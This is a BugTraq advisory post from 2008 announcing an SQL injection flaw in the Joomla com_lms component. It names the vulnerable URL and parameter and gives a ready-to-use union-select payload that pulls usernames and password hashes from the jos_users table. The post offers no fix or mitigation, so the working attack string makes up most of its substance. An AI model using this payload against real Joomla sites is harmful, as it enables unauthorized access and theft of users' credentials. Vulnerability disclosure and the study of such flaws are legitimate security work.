BugTraq
Joomla Component com_lms SQL Injection Apr 03 2008 01:00AM
no-reply aria-security net
Aria-Security Team (Persian Security Network)

http://aria-security.net

----------------------------------

Joomla Component com_lms SQL Injection

Greetz: AurA, Mormoroth, Null, t3rr0r1st

Discovered by The-0utl4w

Vendor: joomlashowroom.com/

Original Advisory: http://forum.aria-security.com/showthread.php?p=61

Vuln:

index.phpoption=com_lms&task=showTests&cat=somenumber

Example:

-1 union select 1,concat(username,char(32),password),3,4,5,6,7 from jos_users/*

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus